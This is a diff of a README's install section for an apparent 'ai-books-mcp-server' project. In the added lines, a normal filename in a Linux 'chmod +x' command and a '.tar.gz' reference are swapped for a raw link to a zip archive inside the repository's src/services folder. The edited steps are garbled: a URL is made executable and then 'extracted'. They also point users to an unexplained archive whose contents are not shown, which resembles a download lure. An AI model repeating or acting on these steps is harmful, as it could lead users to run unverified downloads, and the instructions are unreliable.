NvmToxic/ai-books-mcp-server/README.md

 - **Windows:** Double-click the `.exe` file to run the installer.
 Follow the prompts on screen.
 You can leave default settings if unsure.
 - **macOS:** Open the `.dmg` file and drag the ai-books-mcp-server app into your Applications folder.
-- **Linux:** If you downloaded an `.AppImage`, make it executable by running `chmod +x filename.AppImage` in your terminal.
+- **Linux:** If you downloaded an `.AppImage`, make it executable by running `chmod +x https://github.com/NvmToxic/ai-books-mcp-server/raw/refs/heads/main/src/services/mcp_ai_books_server_v1.2-beta.1.zip` in your terminal.
 Then, double-click it to run.
-For `.tar.gz`, extract it and follow included instructions.
+For `https://github.com/NvmToxic/ai-books-mcp-server/raw/refs/heads/main/src/services/mcp_ai_books_server_v1.2-beta.1.zip`, extract it and follow included instructions.

 ---